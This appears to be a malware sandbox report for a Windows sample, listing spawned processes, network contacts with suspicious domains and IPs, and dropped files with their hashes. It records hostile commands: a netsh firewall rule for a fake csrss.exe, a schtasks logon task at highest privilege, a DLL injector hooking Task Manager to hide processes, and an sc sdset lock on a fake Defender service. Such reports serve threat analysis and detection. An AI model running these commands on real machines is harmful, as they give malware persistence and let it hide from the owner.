"C:\Users\Admin\AppData\Local\Temp\ub4.0.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe

"C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe"

C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe

"C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe"

C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe

"C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe"

C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe

"C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\ub4.1.exe

"C:\Users\Admin\AppData\Local\Temp\ub4.1.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4384 -ip 4384

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 828

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
BE 88.221.83.187:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
BE 88.221.83.187:443 www.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 187.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 onlycitylink.com udp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 nic-it.nl udp
US 8.8.8.8:53 realdeepai.org udp
RU 193.233.132.234:80 tcp
RU 193.233.132.175:80 tcp
RU 193.233.132.234:80 tcp
US 172.67.169.89:443 yip.su tcp
US 172.67.182.192:443 onlycitylink.com tcp
US 172.67.182.192:443 onlycitylink.com tcp
US 172.67.193.79:443 realdeepai.org tcp
US 172.67.193.79:443 realdeepai.org tcp
DE 138.201.79.103:80 nic-it.nl tcp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
DE 185.172.128.90:80 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 45.87.157.20.in-addr.arpa udp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 download.iolo.net udp
FR 185.93.2.244:443 download.iolo.net tcp
US 8.8.8.8:53 244.2.93.185.in-addr.arpa udp
US 8.8.8.8:53 6c7c7b80-25b9-42e9-9f99-faa46e51d818.uuid.thestatsfiles.ru udp
US 20.157.87.45:80 svc.iolo.com tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 145.155.9.20.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 stun1.l.google.com udp
US 8.8.8.8:53 server10.thestatsfiles.ru udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 74.125.250.129:19302 stun1.l.google.com udp
BG 185.82.216.96:443 server10.thestatsfiles.ru tcp
US 8.8.8.8:53 carsalessystem.com udp
US 8.8.8.8:53 129.250.125.74.in-addr.arpa udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 96.216.82.185.in-addr.arpa udp
US 104.21.94.82:443 carsalessystem.com tcp
US 8.8.8.8:53 82.94.21.104.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
BG 185.82.216.96:443 server10.thestatsfiles.ru tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/2208-0-0x000001B8BD480000-0x000001B8BD490000-memory.dmp

memory/2208-1-0x00007FFE0DD13000-0x00007FFE0DD15000-memory.dmp

memory/2208-2-0x000001B8D7830000-0x000001B8D7840000-memory.dmp

memory/2208-3-0x000001B8D78A0000-0x000001B8D78FC000-memory.dmp

memory/2208-4-0x00007FFE0DD10000-0x00007FFE0E7D1000-memory.dmp

memory/2324-5-0x0000000000400000-0x0000000000408000-memory.dmp

memory/956-6-0x00007FFE0DD10000-0x00007FFE0E7D1000-memory.dmp

memory/956-8-0x00007FFE0DD10000-0x00007FFE0E7D1000-memory.dmp

memory/956-10-0x000002636F550000-0x000002636F560000-memory.dmp

memory/2324-9-0x000000007543E000-0x000000007543F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wyaxuwu0.mwy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/956-7-0x000002636F440000-0x000002636F462000-memory.dmp

memory/956-22-0x00007FFE0DD10000-0x00007FFE0E7D1000-memory.dmp

memory/2208-23-0x00007FFE0DD10000-0x00007FFE0E7D1000-memory.dmp

C:\Users\Admin\Pictures\ithBmClusvplneWfNY8PSmSW.exe

MD5 77f762f953163d7639dff697104e1470
SHA1 ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256 d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512 d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

C:\Users\Admin\Pictures\2mrCJiNcvDZlVcoL6UnFi2xt.exe

MD5 949f191270e024e75823b32174f15754
SHA1 e2685aee44aaee2bc87888ee7c86d77bba313eae
SHA256 c3356a89f9d9962232df6a5d6dbfb42a9e2b2578b2a8d89c20b61c4c2e72c71c
SHA512 d3eea70b18938ab93b4d659a0dcb793ab1f440614763b005c9e3f9bf36e4ad49c87cd9d436d2821c34c194a6ec384c57351be4bf9164caaf269046d29c01a55a

C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe

MD5 830ca2606715fd6b7e3c505e48fb3981
SHA1 4ee89fbbdd4982120f5223bbbd6c5e2a14f3f178
SHA256 c5e99a29023acdc26c1acc3313f38be017cf2d254e4a95af68cd246bbd9f45a7
SHA512 2474047b586574857ad4d1d51ed70db41e3f9cb748d9efeb85f8ca486037d578cb71acb5a788f32c2f6017276d62d826be8638b2c8e26d8b6e16146a611b805a

C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe

MD5 f5f50605dde6046858bbd38295e10734
SHA1 49023dd468951c62e763d81201da16c0160a8814
SHA256 5e78965522de207305a894b1aa7643cc44238b52ee2f1532e4e7f9270648b68d
SHA512 fb8fc4e8756b8f761651bf30ca1e8d06e77c7f42f78ce30aa947244246363a65fc2caba12c7c55bb91cb7db118e11cffe7459c7a1bf99116f2e9a30ea755c9cf

C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe

MD5 a4a8dc8b0e657d58f55b5ea1a52650e3
SHA1 69475443fc00e3ba6a4d2c0f9aa498f2fae90cc0
SHA256 bf2dbea28bbe31217a2d7fde93ab43179a1d745e301b7e4195c0eb7c5a5a3eb3
SHA512 4f8b0be2127d9e70fca3bd051897f52f9a3567be468f2d8dc9cf93e5a90b85bf9bc15cd2706842d4b829b3230af6677b5a0f233791e05f1a767c70f2ad013416

C:\Users\Admin\AppData\Local\Temp\ub4.0.exe

MD5 8a9a1b742b75353c203f733b24d071ff
SHA1 1e390f6625abeaf1b8155ed4a356547047429c01
SHA256 ab5504a33a8bc3ac59151aa8c10e03600eca853df87a8080e3fdff8b0dc409f1
SHA512 df684e2538811b4c71df55493502bf6736a419ea61e45bac6f40e9efd6504e19a214382ac2ab692c082dff69923124df54e3a820529e7c2ddf5e962fdf5ea78d

memory/372-110-0x0000000002570000-0x00000000025A6000-memory.dmp

memory/372-111-0x0000000004C30000-0x0000000005258000-memory.dmp

memory/548-112-0x0000000005850000-0x0000000005872000-memory.dmp

memory/548-114-0x0000000005B60000-0x0000000005BC6000-memory.dmp

memory/548-113-0x0000000005AF0000-0x0000000005B56000-memory.dmp

memory/372-129-0x0000000005580000-0x00000000058D4000-memory.dmp

memory/548-152-0x0000000006910000-0x000000000692E000-memory.dmp

memory/548-153-0x0000000006F20000-0x0000000006F6C000-memory.dmp

memory/936-154-0x0000000007050000-0x0000000007094000-memory.dmp

memory/548-155-0x0000000007A30000-0x0000000007AA6000-memory.dmp

memory/372-157-0x0000000006F20000-0x0000000006F3A000-memory.dmp

memory/372-156-0x0000000007580000-0x0000000007BFA000-memory.dmp

memory/372-171-0x0000000007140000-0x00000000071E3000-memory.dmp

memory/372-170-0x0000000007120000-0x000000000713E000-memory.dmp

memory/372-183-0x0000000007230000-0x000000000723A000-memory.dmp

memory/936-184-0x00000000705C0000-0x000000007060C000-memory.dmp

memory/936-185-0x000000006FBD0000-0x000000006FF24000-memory.dmp

memory/3264-196-0x000000006FBD0000-0x000000006FF24000-memory.dmp

memory/548-206-0x00000000087B0000-0x0000000008846000-memory.dmp

memory/3264-195-0x00000000705C0000-0x000000007060C000-memory.dmp

memory/548-173-0x000000006FBD0000-0x000000006FF24000-memory.dmp

memory/548-207-0x0000000008000000-0x0000000008011000-memory.dmp

memory/548-172-0x00000000705C0000-0x000000007060C000-memory.dmp

memory/372-160-0x000000006FBD0000-0x000000006FF24000-memory.dmp

memory/372-159-0x00000000705C0000-0x000000007060C000-memory.dmp

memory/372-158-0x00000000070E0000-0x0000000007112000-memory.dmp

memory/936-208-0x0000000007860000-0x000000000786E000-memory.dmp

memory/936-209-0x0000000007870000-0x0000000007884000-memory.dmp

memory/936-210-0x0000000007960000-0x000000000797A000-memory.dmp

memory/372-211-0x00000000072D0000-0x00000000072D8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 e6dc964954e53da616d9cce4354acefd
SHA1 c96dc63426f35782db8dde8d74bca449fdf93d72
SHA256 d7e6e65fbf62a35bf144ea7c9b8e2e3e39e97f0c44f9beb3db95d0ccc2472436
SHA512 7603353972fdaeffcf8dff26eaaf7aa0eb1a1b2fc02ef7869e96d0857cd864afb57444c2d121db50be05e836d20c48f3cd1790f63ef0ea3fe8a2b2e037d9f8f1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1d7f3d1036cc09d2b9c5d8d5acfbb867
SHA1 5a76ade3e2ced7d72b6ce450b074d3c5aaa13b85
SHA256 0725190ee120338da973024f3d633bd17d0009af194000fa0a91dde961a8d76c
SHA512 dc993da2058b91cd4870b0e868963cadd68d0c03aee091691d7ed0a027215ef5114c9d56ec8d9e228cd7d022339d277903fc12481e2e00df758a3915a17d1fd8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 4e2ba9eee51d53935376702601b51727
SHA1 073a093073d2cef89c303ddf348513589be9f16b
SHA256 f9e77e8f0c6359f5c969f55880b053abb2e01ccad8142f0a6b5503d8b0786079
SHA512 5abcfd383c90293093ad4681095481aff945c7c89eb1d7d7f7c03930dbc4a71aa4b70eb2fa4c408530e4ace9d3d93c9dfd73f049a058b432cdec45dfda1e1024

memory/4132-225-0x0000000000400000-0x0000000002957000-memory.dmp

memory/4540-228-0x0000000000400000-0x0000000002957000-memory.dmp

memory/4804-229-0x0000000000400000-0x0000000002957000-memory.dmp

memory/400-226-0x0000000000400000-0x0000000002597000-memory.dmp

memory/3672-259-0x0000000005BE0000-0x0000000005F34000-memory.dmp

memory/4128-270-0x00000000705C0000-0x000000007060C000-memory.dmp

memory/3672-282-0x00000000705C0000-0x000000007060C000-memory.dmp

memory/3876-294-0x000000006FA80000-0x000000006FDD4000-memory.dmp

memory/3876-293-0x00000000705C0000-0x000000007060C000-memory.dmp

memory/3672-283-0x000000006FA80000-0x000000006FDD4000-memory.dmp

memory/4128-271-0x000000006FA80000-0x000000006FDD4000-memory.dmp

memory/4128-281-0x0000000006E20000-0x0000000006EC3000-memory.dmp

memory/3376-305-0x000000006FA80000-0x000000006FDD4000-memory.dmp

memory/4128-306-0x0000000007110000-0x0000000007121000-memory.dmp

memory/3376-304-0x00000000705C0000-0x000000007060C000-memory.dmp

memory/3672-316-0x00000000076A0000-0x00000000076B4000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 c0fe42a23f62ad6b8635e771925efe4b
SHA1 f85f87ef0bc23ac950dea60c50ed3aa284de848a
SHA256 82a79d1a5aeb910e2a90624b8f3f25ff2eafc35108a7939901ebbaf88463c261
SHA512 64ba958132ae6c94c858b7be2566d8a298dc9089fbaeca889db975a11c5821ca7860f47589f2ba0c8b00e8ef37317553ef7a212720318c35b33f915006f3d321

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 0740b1875d010a32ecc88839c8a4d51c
SHA1 39c667fc73464601661aca2815b3fba6990f66ca
SHA256 39890dd2b5f46e51b23171f945b563a37e4773fe14fada4fed8c7e94c0d51100
SHA512 808689afaf35a93146363624c1d7c74e4ee572fddcd60371320b0272e5662509d97c972c4ff9f3ce1f255027e09ff989f69e54342e4110b35d74078a4885142f

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 3fa6ec8ba1dabb4222281ce95961e0ac
SHA1 5d37d35b4aef52213b70f83f72bb237778634257
SHA256 f5fdc5f6a050462b659d52b874781abe4117374dc01c4e6ff57e7955cb562ab9
SHA512 300b563c95ef3e06a91da0202a207c9fb70cf7ced91b11c0665129849c2c0e08dcac990d818b2c13eb10555ff02e58dd968cf884fc5e9b2b863a74aef0a8e279

memory/4384-327-0x0000000000400000-0x0000000002574000-memory.dmp

memory/4340-326-0x0000000000400000-0x0000000002957000-memory.dmp

memory/5532-365-0x00000000705C0000-0x000000007060C000-memory.dmp

memory/5532-366-0x000000006FA80000-0x000000006FDD4000-memory.dmp

memory/5644-387-0x000000006FA80000-0x000000006FDD4000-memory.dmp

memory/5644-386-0x00000000705C0000-0x000000007060C000-memory.dmp

memory/5612-377-0x000000006FA80000-0x000000006FDD4000-memory.dmp

memory/5612-376-0x00000000705C0000-0x000000007060C000-memory.dmp

memory/5892-398-0x00000000705C0000-0x000000007060C000-memory.dmp

memory/5892-399-0x000000006FA80000-0x000000006FDD4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ub4.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/5612-412-0x0000000006140000-0x0000000006154000-memory.dmp

memory/400-421-0x0000000000400000-0x0000000002597000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 f5fa08d786b763d400497fd27db396e6
SHA1 f14b9879b5cb2ad5b0696b9e82e4ff1a6b28a8d9
SHA256 7c3dc21440774eb116224e8ea82e267c5bbf818a958cf67a0826f5ee5439c7a1
SHA512 824b9767531c68218ca14c68a6b7b87b2cbb08d44c122d51ea8dffe4383954530c53a54877958df733e022ce74c6479a0db793f9143940402617578f058a692f

memory/5892-431-0x0000000006570000-0x0000000006584000-memory.dmp

memory/3636-468-0x0000000000400000-0x0000000002957000-memory.dmp

memory/3856-470-0x0000000000400000-0x0000000002957000-memory.dmp

memory/1596-471-0x0000000000400000-0x0000000002957000-memory.dmp

memory/3764-469-0x0000000000400000-0x0000000002957000-memory.dmp

memory/2232-484-0x00000000705C0000-0x000000007060C000-memory.dmp

memory/2232-485-0x000000006FA80000-0x000000006FDD4000-memory.dmp

memory/3876-474-0x000000006FA80000-0x000000006FDD4000-memory.dmp

memory/3876-473-0x00000000705C0000-0x000000007060C000-memory.dmp

memory/3876-504-0x00000000074B0000-0x00000000074C1000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 7ef1e9f460ebad645bd0b189fac5231c
SHA1 7fee462fc33777b495158b164f0bbf1b27fa8b37
SHA256 172e4023a3eb39719555d47d67a8b5985448e6084eb4254e5a116299baad8c25
SHA512 1a848c5bc5774571abb0f8180d53f25e7a2ff86347af777b8d8ed5be1c7402c7d71efd4ac29bb88be6cbfd34ee3fa05ea1ceb0a9c3a9d551746b2c21e6992fd1

memory/4352-506-0x00000000705C0000-0x000000007060C000-memory.dmp

memory/4352-508-0x000000006FA80000-0x000000006FDD4000-memory.dmp

memory/3876-507-0x00000000058A0000-0x00000000058B4000-memory.dmp

memory/5904-519-0x000000006FA80000-0x000000006FDD4000-memory.dmp

memory/5904-518-0x00000000705C0000-0x000000007060C000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 c5a4e6be2cbfe84af9d54ce75e96e998
SHA1 de9c72949a2fa6833cef2083ac3e0f1b16290787
SHA256 2002d72055844220040f0dad586eba7305fec5c13464d40b781e7e7d85850b4f
SHA512 72431c400808dafb5a496e3fbbcb6035fe5027e47e46e0e2c49e5e4e9fd5fbcfa7d267160d7133f1dc1687c8e0b88ff2eee9bab9b3aabd1e7210e581203b74ed

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 1e1439dc54b01dce37cab386570d259e
SHA1 28cb58169be2931fe7d308246f801c7d21997b77
SHA256 3b34b603d2c52e830c985b3265807689aeb5053cd1d983d5c1a10696b72286a0
SHA512 8d83f9896605bb7b976a029a47e6e2089a54b61fc6b1869e3266bfa3a18e927acf66ba658f97de5c59d8351237ee6b671f8e75a441c01e6d5dd658fdb58e5666

memory/3636-543-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 ca4037a976872b7be0c58a8e17f46cb3
SHA1 e0565aeaea6521193643c5120c86f1e7bcad33c9
SHA256 cc81bf5ef718d2e7b7d29bc49a498236d4519ac310b9483dc23c5bd8236b4574
SHA512 27c6c87e6ee05f0a4b93a3e85906a78f6c17ee817c01151febd09ff9e07ef1a642c1a850ab5ff31ff66bc079b7b2bb7134f2b1ea9075145ff200a94fa04f37f3

memory/3764-555-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 e27eb13dc4f3e190b304c055db45c1f7
SHA1 c06693a71ba006ac698cb7dd2db13c86c78da555
SHA256 d276f48c6c093ea1fbb1c0eb489a831f93511d6ca838fb5472a1236ab806c7b4
SHA512 4426aad47b5a2ad9ec8e830ba22417f96cd2fbea89e21074a1e994d5eed9ebca2cde2ae6c940a60e0b60c9d97dc7900441c90f845f4cc2f1da326c5df30361af

memory/1596-556-0x0000000000400000-0x0000000002957000-memory.dmp

memory/3856-559-0x0000000000400000-0x0000000002957000-memory.dmp

memory/5688-570-0x0000000006CC0000-0x0000000006D0C000-memory.dmp

memory/3452-575-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/4384-574-0x0000000000400000-0x0000000002574000-memory.dmp

memory/5688-578-0x0000000070600000-0x000000007064C000-memory.dmp

memory/5688-579-0x000000006FBD0000-0x000000006FF24000-memory.dmp

memory/5688-589-0x0000000007CF0000-0x0000000007D01000-memory.dmp

memory/5688-590-0x0000000006580000-0x0000000006594000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 99e2218fe1c62f21ad0dfb523d613877
SHA1 278565ccfcd8967bcb8ec538317abd65f62d301e
SHA256 4d1bb7f3b202a55e2e3a6c2888dba8ade47a8aa1efce84321d2f75b4866a7942
SHA512 ec5e4cf16a0d866dd0f3aafbf026ff9a3c2cb393ec314e7b222e60d68372f5267e982fbf72620a075859923666a7fff5528b1507d0001e19269c85df52fb932a

memory/5992-604-0x0000000070600000-0x000000007064C000-memory.dmp

memory/5992-605-0x000000006FBD0000-0x000000006FF24000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 68fb2093272defa3fcc412d796365bd6
SHA1 0b1531f101d2585f88c0a7f14197a1d04bc461fa
SHA256 2dcba2a18679277ad9adaf5ba6748644f1bf5a24ea95732da62982a8080b8b15
SHA512 70127f25d5cd84f1df82a74fe45679093aca03a503ac5e71067f58a23fb236ec2af69a56e41fa8e9e0ea8a3997de94070517e14a6aef7cda780058e4623f3ad2

memory/5992-622-0x0000000007D10000-0x0000000007D21000-memory.dmp

memory/5992-623-0x0000000006590000-0x00000000065A4000-memory.dmp

memory/3452-629-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/6040-630-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 4c45dc409f2787f34cb344c339375956
SHA1 bcfe78a63869e1fc7e4f6898abbe7fb5b3e3b120
SHA256 07678c034a2adc5731c0d5218cdeab01970c3803283b893f895a8f2c40922efe
SHA512 f6a07b8e794aa9fa9146668c6d06d20241574ab5fb12a553466ab7f1d068b1b427be5b9f56d7d6c3f7dafa5fc4811c76e5d4300ef765d31ed7c63632fc0fb4e2

memory/3452-641-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/4720-642-0x0000021309170000-0x000002130C9A4000-memory.dmp

memory/4720-643-0x0000021327610000-0x000002132771A000-memory.dmp

memory/4720-645-0x000002130E760000-0x000002130E76C000-memory.dmp

memory/4720-644-0x000002130CE60000-0x000002130CE70000-memory.dmp

